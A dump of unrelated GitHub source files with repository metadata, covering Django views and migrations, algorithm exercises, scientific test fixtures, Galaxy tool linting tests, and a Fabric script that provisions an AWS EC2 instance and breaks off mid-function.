class ThreadMemberViewSet(viewsets.ModelViewSet):
serializer_class = ThreadMemberSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = ThreadMember.objects.all()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
726f56c748b2aa68e9e184b243ff36945ab2243e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02421/s282455109.py
|
e0be63d9b3954f9063104c79b5c40180297004d4
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
point_a,point_b = 0,0
for i in range(int(input())):
k =[]
a,b = input().split()
k = [[i,j] for i,j in zip(a,b) if i != j]
if k == []:
if len(a) < len(b):
point_b+=3
elif len(a) > len(b):
point_a += 3
else:
point_a+=1
point_b+=1
elif ord(k[0][0]) < ord(k[0][1]):
point_b += 3
else :
point_a += 3
print(point_a,point_b)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
e5cb1c5a23fb4af6846b5bf7dc61c210c9fbfe4d
|
b68115ac6cd996c1a09d70c2cf7158715c125aae
|
/simulation/tests/context.py
|
542253303d40ec9076d7a91ffa82a0c73939aaa3
|
[] |
no_license
|
joakim-hove/fmu_storage
|
3a71d7521818658a252e90a3b08c32810a86d544
|
c02feb69493a9e17592b1b5e3cf201c559b20bdf
|
refs/heads/master
| 2021-08-28T06:54:59.291006
| 2017-12-11T13:51:36
| 2017-12-11T13:51:36
| 103,049,778
| 0
| 2
| null | 2017-09-14T13:14:26
| 2017-09-10T17:53:27
|
Python
|
UTF-8
|
Python
| false
| false
| 2,918
|
py
|
import getpass
import os
import grp
import random
from ecl.ecl import EclGrid, EclGridGenerator, EclSum, openFortIO, EclFile
from ecl.test import TestAreaContext
from ecl.test.ecl_mock import createEclSum
from simulation.models import *
def fopr(days):
return days
def random_fopr(days):
return fopr(days) * random.random( )
def fopt(days):
return days
def random_fopt(days):
return fopt(days) * random.random()
def fgpt(days):
if days < 50:
return days
else:
return 100 - days
def random_fgpt(days):
return fgpt(days) * random.random()
class TestContext(object):
def __init__(self):
length = 100
case = createEclSum("CASE" , [("FOPT", None , 0) , ("FOPR" , None , 0), ("FGPT" , None , 0)],
sim_length_days = length,
num_report_step = 10,
num_mini_step = 10,
func_table = {"FOPT" : fopt,
"FOPR" : fopr ,
"FGPT" : fgpt })
self.user = getpass.getuser()
self.group = grp.getgrgid( os.getgid( ) )[0]
self.case = case
with TestAreaContext("summary"):
case.fwrite( )
self.summary = Summary.create( "CASE.SMSPEC" , "CASE.UNSMRY" , self.group )
self.simulation = Simulation.create( summary = self.summary, parameters = [("CPARAM1", 100), ("CPARAM2", 200)] )
self.grid = EclGridGenerator.create_rectangular( (10,10,10),(1,1,1) )
@classmethod
def create_INIT(cls):
ecl_kw = EclKW(1000 , "PORV" , EclDataType.ECL_FLOAT )
with openFortIO("CASE.INIT", FortIO.WRITE_MODE) as f:
ecl_kw.fwrite( f )
return EclFile( "CASE.INIT" )
@classmethod
def create_UNRST(cls):
ecl_kw = EclKW(1000 , "PRESSURE" , EclDataType.ECL_FLOAT )
with openFortIO("CASE.UNRST", FortIO.WRITE_MODE) as f:
ecl_kw.fwrite( f )
return EclFile( "CASE.UNRST" )
@classmethod
def random_simulation(cls):
length = 100
case = createEclSum("CASE" , [("FOPT", None , 0) , ("FOPR" , None , 0), ("FGPT" , None , 0)],
sim_length_days = length,
num_report_step = 10,
num_mini_step = 10,
func_table = {"FOPT" : random_fopt,
"FOPR" : random_fopr ,
"FGPT" : random_fgpt })
group = grp.getgrgid( os.getgid( ) )[0]
with TestAreaContext("summary"):
case.fwrite( )
summary_case = Summary.create( "CASE.SMSPEC" , "CASE.UNSMRY" , group )
return Simulation.create( summary = summary_case, parameters = [("CPARAM1", 100*random.random()), ("CPARAM2", 200*random.random())] )
|
[
"joakim.hove@gmail.com"
] |
joakim.hove@gmail.com
|
28071d902234225339df9863437a44aa01511de6
|
6cc50a15672155f7d66e88830ad1baec6a061077
|
/processing/legacy/anisotropy/random_trials/grid_test/submitter.py
|
237c124558f1838e5cf2d1f6b45d2c356f636c95
|
[
"MIT"
] |
permissive
|
jrbourbeau/cr-composition
|
16b29c672b2d1c8d75c1c45e35fe6bb60b53ffe2
|
e9efb4b713492aaf544b5dd8bb67280d4f108056
|
refs/heads/master
| 2020-06-24T21:48:21.784277
| 2018-11-01T21:30:56
| 2018-11-01T21:30:56
| 74,618,907
| 0
| 1
|
MIT
| 2018-08-23T21:01:03
| 2016-11-23T22:31:01
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,237
|
py
|
#!/usr/bin/env python
import os
import pycondor
import comptools as comp
if __name__ == "__main__":
# Define output directories
error = os.path.join(comp.paths.condor_data_dir, 'grid_test/error')
output = os.path.join(comp.paths.condor_data_dir, 'grid_test/output')
log = os.path.join(comp.paths.condor_scratch_dir, 'grid_test/log')
submit = os.path.join(comp.paths.condor_scratch_dir, 'grid_test/submit')
# Define path to executables
job_ex = os.path.abspath('test_script.py')
# Extra lines for submitting to the open science grid
extra_lines = ['Requirements = HAS_CVMFS_icecube_opensciencegrid_org',
'use_x509userproxy=true',
'should_transfer_files = YES',
'when_to_transfer_output = ON_EXIT']
grid = 'gsiftp://gridftp-users.icecube.wisc.edu'
# Create Dagman instance
dag_name = 'test_dag'
dagman = pycondor.Dagman(dag_name, submit=submit, verbose=1)
job_name = 'test_job'
job = pycondor.Job(job_name, job_ex, error=error, output=output,
log=log, submit=submit, extra_lines=extra_lines,
verbose=1)
dagman.add_job(job)
dagman.build_submit(fancyname=True)
|
[
"jrbourbeau@gmail.com"
] |
jrbourbeau@gmail.com
|
c35d40a6aaaa6fe00d05db758d350f86d9bc8b5d
|
7bcb0b7f721c8fa31da7574f13ed0056127715b3
|
/src/apps/bi/kruskals.py
|
5a6e72b1e0f1a21c431315fa0eb2abb11ade3fbc
|
[] |
no_license
|
simonchapman1986/ripe
|
09eb9452ea16730c105c452eefb6a6791c1b4a69
|
c129da2249b5f75015f528e4056e9a2957b7d884
|
refs/heads/master
| 2022-07-22T05:15:38.485619
| 2016-01-15T12:53:43
| 2016-01-15T12:53:43
| 49,718,671
| 1
| 0
| null | 2022-07-07T22:50:50
| 2016-01-15T12:53:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,537
|
py
|
__author__ = 'simon'
parent = dict()
rank = dict()
def make_set(vertice):
parent[vertice] = vertice
rank[vertice] = 0
def find(vertice):
if parent[vertice] != vertice:
parent[vertice] = find(parent[vertice])
return parent[vertice]
def union(vertice1, vertice2):
root1 = find(vertice1)
root2 = find(vertice2)
if root1 != root2:
if rank[root1] > rank[root2]:
parent[root2] = root1
else:
parent[root1] = root2
if rank[root1] == rank[root2]: rank[root2] += 1
def kruskal(graph):
for vertice in graph['vertices']:
make_set(vertice)
minimum_spanning_tree = set()
edges = list(graph['edges'])
edges.sort()
for edge in edges:
weight, vertice1, vertice2 = edge
if find(vertice1) != find(vertice2):
union(vertice1, vertice2)
minimum_spanning_tree.add(edge)
return minimum_spanning_tree
def example():
"""
>>> graph = {\
'vertices': ['A', 'B', 'C', 'D', 'E', 'F'],\
'edges': set([\
(1, 'A', 'B'),\
(5, 'A', 'C'),\
(3, 'A', 'D'),\
(4, 'B', 'C'),\
(2, 'B', 'D'),\
(1, 'C', 'D'),\
])\
}
>>> minimum_spanning_tree = set([\
(1, 'A', 'B'),\
(2, 'B', 'D'),\
(1, 'C', 'D'),\
])
>>> print bool(kruskal(graph) == minimum_spanning_tree)
True
"""
pass
|
[
"simon-ch@moving-picture.com"
] |
simon-ch@moving-picture.com
|
6fc23d15c1c3ed67d9789862a4419cf73d03b598
|
556f9c2db9c88120dc6dc7bc4280935db78e3eaa
|
/scripts/test_zero.py
|
c28139a20225537e6deb1324f888d975b27f2fee
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
BlockResearchGroup/compas_ags
|
55dde6a2755c644b484767c8c359f6bfe68531a5
|
4507ff09be1a881d3f3520bc465a9dcda52b42ed
|
refs/heads/main
| 2023-04-11T04:43:50.850869
| 2022-11-17T10:46:23
| 2022-11-17T10:46:23
| 113,161,567
| 13
| 5
|
MIT
| 2022-11-17T10:35:43
| 2017-12-05T09:31:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,327
|
py
|
import compas_ags
from compas_ags.diagrams import FormGraph
from compas_ags.diagrams import FormDiagram
from compas_ags.diagrams import ForceDiagram
# from compas_ags.ags import graphstatics
from compas_ags.viewers import Viewer
from compas.rpc import Proxy
graphstatics = Proxy('compas_ags.ags.graphstatics')
# this file has unloaded, 2-valent nodes
# they will be removed automatically
# and the result renumbered
FILE = compas_ags.get('debugging/zero.obj')
graph = FormGraph.from_obj(FILE)
form = FormDiagram.from_graph(graph)
force = ForceDiagram.from_formdiagram(form)
# fix the supports
form.vertices_attribute('is_fixed', True, [8, 7])
# set the loads
form.edge_force((0, 1), +10.0)
form.edge_force((2, 3), +10.0)
form.edge_force((4, 5), +10.0)
# # compute initial form and force diagrams
# graphstatics.form_update_q_from_qind(form)
# graphstatics.force_update_from_form(force, form)
# compute initial form and force diagrams
form.data = graphstatics.form_update_q_from_qind_proxy(form.data)
force.data = graphstatics.force_update_from_form_proxy(force.data, form.data)
# change the geometry of the force diagram
force.vertex_attribute(6, 'x', force.vertex_attribute(8, 'x'))
force.vertex_attribute(9, 'x', force.vertex_attribute(10, 'x'))
force.vertex_attributes(7, 'xyz', force.vertex_attributes(6, 'xyz'))
force.vertex_attributes(11, 'xyz', force.vertex_attributes(9, 'xyz'))
# # change the depth of the structure
# force.vertices_attribute('x', 20, [6, 7, 8, 9, 10, 11])
# fix some of the nodes in the from diagram
# to constraint the problem to a single solution
form.vertices_attribute('is_fixed', True, [0, 2, 5])
# # update the form diagram
# graphstatics.form_update_from_force(form, force)
# update the form diagram
form.data = graphstatics.form_update_from_force_proxy(form.data, force.data)
# ==============================================================================
# Visualize
# ==============================================================================
viewer = Viewer(form, force, delay_setup=False, figsize=(12, 7.5))
viewer.draw_form(
vertexsize=0.15,
vertexcolor={key: '#000000' for key in (8, 7)},
vertexlabel={key: key for key in form.vertices()})
viewer.draw_force(
vertexsize=0.15,
vertexlabel={key: key for key in force.vertices()})
viewer.show()
|
[
"vanmelet@ethz.ch"
] |
vanmelet@ethz.ch
|
1b1047863ca9ab109e3bf32a674b4f7077fcfb6d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_136/1892.py
|
5fc6c54ef1e3222a84986cd7b64701be7742ba30
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
INITIAL_RATE = 2
class Case(object):
def __init__(self,C,F,X):
self.C = C
self.F = F
self.X = X
def solve(self):
time = self.X/INITIAL_RATE
return self.__solve_in_loop(INITIAL_RATE, time,0)
def __solve_in_loop(self,last_rate,last_time,overhead):
while (True):
time_to_farm = self.C/last_rate + overhead
new_rate = last_rate + self.F
new_time = time_to_farm + self.X/new_rate
if new_time >= last_time:
return last_time
last_time = new_time
last_rate = new_rate
overhead = time_to_farm
def parse_stdin():
n = int(raw_input())
cases = []
for i in xrange(n):
c = [float(x) for x in raw_input().split(' ')]
cases.append(Case(c[0],c[1],c[2]))
return cases
def main():
cases = parse_stdin()
i = 1
for c in cases:
print 'Case #{:d}: {:3.7f}'.format(i, c.solve())
i += 1
if __name__ == '__main__':
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
b4d0a06a96fa7688f6cf7f0e79de64a4065cf646
|
c0feb8693883e4b29096ad45b6b2113b7cad69ef
|
/supervised_learning/0x03-optimization/0-main.py
|
dcbea35b2e1336070660c73f686a5451c7af267c
|
[] |
no_license
|
vandeldiegoc/holbertonschool-machine_learning
|
905977a15dbb59753115936215a870fa0f46f52e
|
bda9efa60075afa834433ff1b5179db80f2487ae
|
refs/heads/main
| 2023-07-06T23:28:59.393284
| 2021-08-10T21:58:40
| 2021-08-10T21:58:40
| 318,391,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
#/usr/bin/env python3
import numpy as np
normalization_constants = __import__('0-norm_constants').normalization_constants
if __name__ == '__main__':
np.random.seed(0)
a = np.random.normal(0, 2, size=(100, 1))
b = np.random.normal(2, 1, size=(100, 1))
c = np.random.normal(-3, 10, size=(100, 1))
X = np.concatenate((a, b, c), axis=1)
m, s = normalization_constants(X)
print(m)
print(s)
|
[
"vandeldiegoc@gmail.com"
] |
vandeldiegoc@gmail.com
|
939ef16942fc3121165f9df42f9a4b943a6b7273
|
7ec38beb6f041319916390ee92876678412b30f7
|
/src/leecode/array_medium_1282(2).py
|
74ad89bcac3387e7faae9e44a1009212c7d51539
|
[] |
no_license
|
hopensic/LearnPython
|
3570e212a1931d4dad65b64ecdd24414daf51c73
|
f735b5d865789843f06a623a4006f8883d6d1ae0
|
refs/heads/master
| 2022-02-18T23:11:30.663902
| 2022-02-12T17:51:56
| 2022-02-12T17:51:56
| 218,924,551
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 367
|
py
|
from collections import defaultdict
class Solution:
def groupThePeople(self, groupSizes):
count = defaultdict(list)
for i, size in enumerate(groupSizes):
count[size].append(i)
return [l[i:i + s] for s, l in count.items() for i in range(0, len(l), s)]
lst = [3, 3, 3, 3, 3, 1, 3]
s = Solution()
print(s.groupThePeople(lst))
|
[
"hopensic@gmail.com"
] |
hopensic@gmail.com
|
cd967ebaafe8d50ba8eb76a9166a6187a6d13a31
|
a7e3ffcd2e011f091763370a66aab9bd04d4ffec
|
/trade/urls.py
|
fe530542c751a1c69c2b97f02fb07a1a1b56e89f
|
[] |
no_license
|
jiangyuwei666/Shop
|
0363a5c1c55c796e5ff56f07c663eea4bc08de71
|
78d7d4647f5c101c89fc5188808cddecf16d1ee6
|
refs/heads/master
| 2022-12-27T11:05:57.190555
| 2019-08-18T07:50:37
| 2019-08-18T07:50:37
| 189,996,974
| 0
| 0
| null | 2022-12-16T09:43:17
| 2019-06-03T12:02:22
|
Python
|
UTF-8
|
Python
| false
| false
| 412
|
py
|
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from apps.trade.views import ShoppingCartViewSet, OrderInfoViewSet, OrderGoodsViewSet
router = DefaultRouter()
router.register('shopping_cart', ShoppingCartViewSet)
router.register('order_info', OrderInfoViewSet)
router.register('order_goods', OrderGoodsViewSet)
urlpatterns = [
url(r'', include(router.urls)),
]
|
[
"739843128@qq.com"
] |
739843128@qq.com
|
5f1c7ca9826e83c4e2252cfcfb3335b01d8a46bd
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5636311922769920_0/Python/jonyafek/d-large.py
|
681f1d58b9ba783300076960e61ec020cdc6a53d
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,192
|
py
|
#!/usr/bin/python
def solve(k, c, s):
#print "k: " + str(k)
#print "c: " + str(c)
#print "s: " + str(s)
result = ""
numbers_to_verify = range(1, k + 1)
numbers_to_check = []
while numbers_to_verify:
number = 0
for level in xrange(c):
temp_num = 1
if numbers_to_verify:
temp_num = numbers_to_verify.pop()
#print "temp_num: " + str(temp_num)
#print "level: " + str(level)
if 0 == level:
level_value = temp_num
else:
level_value = (k ** level) * (temp_num - 1)
#print "level value: " + str(level_value)
number += level_value
#print "number: " + str(number)
numbers_to_check.append(number)
#print "appended number: " + str(number)
if len(numbers_to_check) > s:
return "IMPOSSIBLE"
for num in numbers_to_check:
result += str(num) + " "
return result.strip()
import sys
input_lines = open(sys.argv[1], "rt").readlines()
stripped_input_lines = [line.strip() for line in input_lines]
num_tests = int(input_lines[0])
#print num_tests
i=1
for line in stripped_input_lines[1:]:
k = int(line.split()[0])
c = int(line.split()[1])
s = int(line.split()[2])
result = solve(k, c, s)
print "Case #" + str(i) + ": " + str(result)
i += 1
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
05efe8ebcc108f820c6f960b90f10a1c382616f0
|
b5bde7b0be53cf62e4aa19085e75d61636213abb
|
/celebs/migrations/0001_initial.py
|
0b1719c8467ec6535bfa6428967be5b4cddc7c60
|
[] |
no_license
|
pydatageek/imdb-clone-django-vue
|
3ecaa2dbf97225a202c574c06953b4be80fc240b
|
2c77f49be3e5a40b368110630641f22b686eb7bc
|
refs/heads/master
| 2022-12-07T18:29:22.303516
| 2020-04-03T04:54:07
| 2020-04-03T04:54:07
| 252,633,801
| 1
| 0
| null | 2022-11-22T05:27:31
| 2020-04-03T04:40:03
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,349
|
py
|
# Generated by Django 2.2.10 on 2020-04-03 02:02
import celebs.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Celebrity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('added_date', models.DateTimeField(auto_now_add=True, verbose_name='Added Date')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Added Date')),
('slug', models.SlugField(blank=True, max_length=160, unique=True, verbose_name='Slug')),
('first_name', models.CharField(max_length=75, verbose_name='First Name')),
('last_name', models.CharField(max_length=75, verbose_name='Last Name')),
('nick_name', models.CharField(blank=True, default='', max_length=50, verbose_name='Nick Name')),
('birth_date', models.DateField(blank=True, null=True, verbose_name='Birth Date')),
('birth_place', models.CharField(blank=True, default='', max_length=100, verbose_name='Birth Place')),
('content', models.TextField(blank=True, default='', verbose_name='Biography')),
('source_content', models.URLField(blank=True, default='', verbose_name='Biography Souce')),
('trailer', models.URLField(blank=True, default='', help_text='trailer url (ONLY for youtube videos yet)', verbose_name='Trailer')),
('image', models.ImageField(blank=True, default='celebs/default_celeb.jpg', null=True, upload_to=celebs.models.celeb_directory_path, verbose_name='Image')),
('credit_image', models.CharField(blank=True, default='', max_length=250, verbose_name='Image Credit')),
],
options={
'verbose_name': 'Celebrity',
'verbose_name_plural': 'Celebrities',
'ordering': ('last_name', 'first_name'),
},
),
migrations.CreateModel(
name='CelebrityDuty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'verbose_name': 'Celebrity Duty',
'verbose_name_plural': 'Celebrity Duties',
},
),
migrations.CreateModel(
name='Duty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('added_date', models.DateTimeField(auto_now_add=True, verbose_name='Added Date')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Added Date')),
('name', models.CharField(max_length=100, unique=True, verbose_name='Name')),
('slug', models.SlugField(blank=True, max_length=110, unique=True, verbose_name='Slug')),
('code', models.CharField(max_length=1, verbose_name='Code')),
],
options={
'verbose_name': 'Duty',
'verbose_name_plural': 'Duties',
'ordering': ('code',),
},
),
]
|
[
"pydatageek@gmail.com"
] |
pydatageek@gmail.com
|
1aaf359a44b493c5f11b48b1be9151ffa1bd2dcd
|
d2b6b9792e5dde0a994e875d23d8a8ace2651fca
|
/tests/test_build_and_lint.py
|
5d623626f0a8f1d543e647aaf380c31c4bccc2cd
|
[
"AFL-3.0",
"CC-BY-2.5",
"AFL-2.1",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
michauhl/planemo
|
908d9bd95febcce3aa8a2e932260f0bd3151f433
|
fdcc6003c1fa45cbe1d074ad9d0f9a491ba99c06
|
refs/heads/master
| 2020-03-11T20:54:11.424703
| 2018-04-17T19:06:32
| 2018-04-17T19:06:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,573
|
py
|
import os
import yaml
from .test_utils import CliTestCase, skip_if_environ
class BuildAndLintTestCase(CliTestCase):
def test_build_and_lint(self):
with self._isolate():
self._check_exit_code(_init_command())
self._check_lint(exit_code=0)
def test_build_and_lint_with_macros(self):
with self._isolate() as f:
self._check_exit_code(_init_command(macros=True))
self._check_lint(exit_code=0)
macros_file = os.path.join(f, "macros.xml")
assert os.path.exists(macros_file)
def test_lint_fails_if_no_help(self):
with self._isolate():
self._check_exit_code(_init_command(help_text=False))
self._check_lint(exit_code=1)
def test_lint_fails_if_no_test(self):
with self._isolate():
self._check_exit_code(_init_command(test_case=False))
self._check_lint(exit_code=1)
def test_lint_fails_if_no_doi(self):
with self._isolate():
self._check_exit_code(_init_command(doi=False))
self._check_lint(exit_code=1)
@skip_if_environ("PLANEMO_SKIP_CWLTOOL_TESTS")
def test_cwl(self):
with self._isolate() as f:
self._check_exit_code(_cwl_init_command())
self._check_lint(filename="seqtk_seq.cwl", exit_code=0)
with open(os.path.join(f, "seqtk_seq.cwl")) as stream:
process_dict = yaml.load(stream)
assert process_dict["id"] == "seqtk_seq"
assert process_dict["label"] == "Convert to FASTA (seqtk)"
assert process_dict["baseCommand"] == ["seqtk", "seq"]
input0 = process_dict["inputs"][0]
assert input0["inputBinding"]["position"] == 1
assert input0["inputBinding"]["prefix"] == "-a"
assert input0["type"] == "File"
output = process_dict["outputs"][0]
assert output["type"] == "File"
assert output["outputBinding"]["glob"] == "out"
assert process_dict["stdout"] == "out"
with open(os.path.join(f, "seqtk_seq_tests.yml")) as stream:
test_dict = yaml.load(stream)
assert test_dict
@skip_if_environ("PLANEMO_SKIP_CWLTOOL_TESTS")
def test_cwl_fail_on_empty_help(self):
with self._isolate():
self._check_exit_code(_cwl_init_command(help_text=False))
self._check_lint(filename="seqtk_seq.cwl", exit_code=1)
@skip_if_environ("PLANEMO_SKIP_CWLTOOL_TESTS")
def test_cwl_fail_on_no_docker(self):
with self._isolate():
self._check_exit_code(_cwl_init_command(help_text=False))
self._check_lint(filename="seqtk_seq.cwl", exit_code=1)
def _check_lint(self, filename="seqtk_seq.xml", exit_code=0):
lint_cmd = ["lint", "--fail_level", "warn", filename]
try:
self._check_exit_code(lint_cmd, exit_code=exit_code)
except Exception:
with open(filename, "r") as f:
print("Failing file contents are [%s]." % f.read())
raise
def _cwl_init_command(help_text=True, container=True, test_case=True):
command = [
"tool_init", "--force", "--cwl",
"--id", "seqtk_seq",
"--name", "Convert to FASTA (seqtk)",
"--container", "jmchilton/seqtk:v1",
"--name", "Convert to FASTA (seqtk)",
"--example_command", "seqtk seq -a 2.fastq > 2.fasta",
"--example_input", "2.fastq",
"--example_output", "2.fasta"
]
if container:
command.extend(["--container", "jmchilton/seqtk:v1"])
if help_text:
command.extend(["--help_text", "The help text."])
if test_case:
command.append("--test_case")
return command
def _init_command(test_case=True, help_text=True, doi=True, macros=False):
command = [
"tool_init", "--force",
"--id", "seqtk_seq",
"--name", "Convert to FASTA (seqtk)",
"--requirement", "seqtk@1.0-r68",
"--example_command", "seqtk seq -a 2.fastq > 2.fasta",
"--example_input", "2.fastq",
"--example_output", "2.fasta"
]
if test_case:
command.append("--test_case")
if help_text:
command.extend(["--help_text", "The help text."])
if doi:
command.extend(["--doi", "10.1101/014043"])
command.extend(["--cite_url", "https://github.com/ekg/vcflib"])
command.extend(["--cite_url", "http://wiki.hpc.ufl.edu/doc/Seqtk"])
if macros:
command.append("--macros")
return command
|
[
"jmchilton@gmail.com"
] |
jmchilton@gmail.com
|
61eb0d93423d7ff12f16262371ed2cf4fa2a0fa6
|
5736e117e8d0e011107c3ce4943cce44ea242263
|
/DP/Lavenshtein.py
|
8744443adb2b9663278c3aa5e76d760482984ce3
|
[] |
no_license
|
arvakagdi/Dynamic-Programming
|
7119d2005f12b9b441b6e3a582d99a5e4ddffa4d
|
49a199413fa939335308533a8303974e3a82cc5c
|
refs/heads/main
| 2023-01-11T01:36:36.862590
| 2020-11-14T14:10:14
| 2020-11-14T14:10:14
| 312,829,648
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,302
|
py
|
# Time: O(mn) || Spacr: O(nm)
def levenshteinDistance(str1, str2):
# set up a matrix of size of first and second string
edits = [[x for x in range(len(str1)+1)] for y in range(len(str2) + 1)]
for i in range(1,len(str2) + 1):
edits[i][0] = edits[i - 1][0] + 1 # set 1st(0th) column to base values
for i in range(1,len(str2) + 1):
for j in range(1,len(str1) + 1):
if str2[i - 1] == str1[j - 1]:
edits[i][j] = edits[i - 1][j - 1]
else:
edits[i][j] = 1 + min(edits[i-1][j], edits[i][j-1], edits[i-1][j-1])
return edits[-1][-1]
def levenshteinDistance1(str1, str2):
small = str1 if len(str1) < len(str2) else str2
big = str1 if len(str1) >= len(str2) else str2
evenEdits = [x for x in range(len(small) + 1)]
oddEdits = [None for x in range(len(small) + 1)]
for i in range(1, len(big) + 1):
if i % 2 == 1:
curr = oddEdits
prev = evenEdits
else:
curr = evenEdits
prev = oddEdits
curr[0] = i
for j in range(1,len(small) + 1):
if big[i-1] == small[j-1]:
curr[j] = prev[j-1]
else:
curr[j] = 1 + min(prev[j-1], curr[j-1], prev[j])
return evenEdits[-1] if len(big)%2 == 0 else oddEdits[-1]
print(levenshteinDistance1("abc", "yabd"))
|
[
"noreply@github.com"
] |
arvakagdi.noreply@github.com
|
b2936740e8936183c7d49945d098ee718bc25273
|
86c360ece5931b8a48f895e8233a571720a5c273
|
/fabfile.py
|
a589579347eeb70a07bdf0c72850e3ad088f3d88
|
[] |
no_license
|
dschien/bbc_tool_deploy
|
c83501a33fa17754a530a36391637a59569d497c
|
ab136aa7872031b99fcee318bc23390b93639db1
|
refs/heads/master
| 2021-01-10T12:20:28.586805
| 2016-10-19T16:10:06
| 2016-10-19T16:10:06
| 52,797,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| true
| false
| 6,817
|
py
|
import boto3
import ConfigParser
import logging
import boto3
import time
from fabric.api import *
from fabric.contrib.files import exists
CONFIG_FILE = "settings.cfg"
config = ConfigParser.RawConfigParser()
config.read(CONFIG_FILE)
env.forward_agent = True
env.update(config._sections['ec2'])
env.hosts = [config.get('ec2', 'host')]
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - [%(levelname)s] - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
container_state = {'RUNNING': 1, 'STOPPED': 2, 'NOT_FOUND': 3}
def create_instance():
print('creating instance')
ec2 = boto3.resource('ec2')
instances = ec2.create_instances(
ImageId='ami-e1398992',
MinCount=1,
MaxCount=1,
KeyName='ep-host',
SecurityGroupIds=['sg-e78fbc83'],
InstanceType='m4.large',
Placement={
'AvailabilityZone': 'eu-west-1a',
},
BlockDeviceMappings=[
{
'DeviceName': '/dev/xvda',
'Ebs': {
'SnapshotId': 'snap-7d042fb4',
'VolumeSize': 8,
'DeleteOnTermination': True,
'VolumeType': 'gp2',
},
},
],
IamInstanceProfile={'Name': 'ec2_default_instance_role'},
EbsOptimized=True | False
)
iid = instances[0].id
# give the instance a tag name
ec2.create_tags(
Resources=[iid],
Tags=mktag(env.notebook_server_tag)
)
return instances[0]
from fabric.colors import red, green
def assert_running(instance):
if instance.state['Name'] != "running":
print "Firing up instance"
instance.start()
# Give it 10 minutes to appear online
for i in range(120):
time.sleep(5)
# instance.update()
print instance.state
if instance.state['Name'] == "running":
break
else:
print red("Instance did not enter 'running' state within 120s.")
if instance.state['Name'] == "running":
dns = instance.public_dns_name
print "Instance up and running at %s" % dns
config.set('ec2', 'host', dns)
config.set('ec2', 'instance', instance.id)
# config.write(CONFIG_FILE)
print "updating env.hosts"
env.hosts = [dns, ]
print env.hosts
# Writing our configuration file to 'example.cfg'
with open(CONFIG_FILE, 'wb') as configfile:
config.write(configfile)
return instance
def mktag(val):
    """Build an EC2 tag list assigning *val* as the instance 'Name' tag."""
    name_tag = {'Key': 'Name', 'Value': val}
    return [name_tag]
def assert_instance():
    """
    Return the EC2 instance tagged as the notebook server, creating a new
    one or starting the existing one as necessary.
    :return: a boto3 Instance in (or heading towards) the running state
    """
    ec2 = boto3.resource('ec2')
    # Look the instance up by its Name tag; the state filter is left
    # commented out so stopped instances are found and restarted too.
    instances = ec2.instances.filter(
        Filters=[{'Name': 'tag:Name', 'Values': [env.notebook_server_tag]},
                 # {'Name': 'instance-state-name', 'Values': ['running']}
                 ])
    instance_list = [instance for instance in instances]
    if len(instance_list) == 0:
        print('not existing, will create')
        return create_instance()
    else:
        # NOTE(review): if several instances share the tag, only the first
        # match is considered.
        return assert_running(instance_list[0])
def initial_deployment_with_assert():
    # Ensure the instance exists and is running, then run the initial
    # deployment against its public DNS name.
    print('checking instance')
    instance = assert_instance()
    execute(_initial_deployment, hosts=[instance.public_dns_name])
def initial_deployment():
    # Run the initial deployment against the hosts already in env.hosts.
    execute(_initial_deployment)
def _initial_deployment():
    # Provision a fresh host: install and start docker, clone the repo
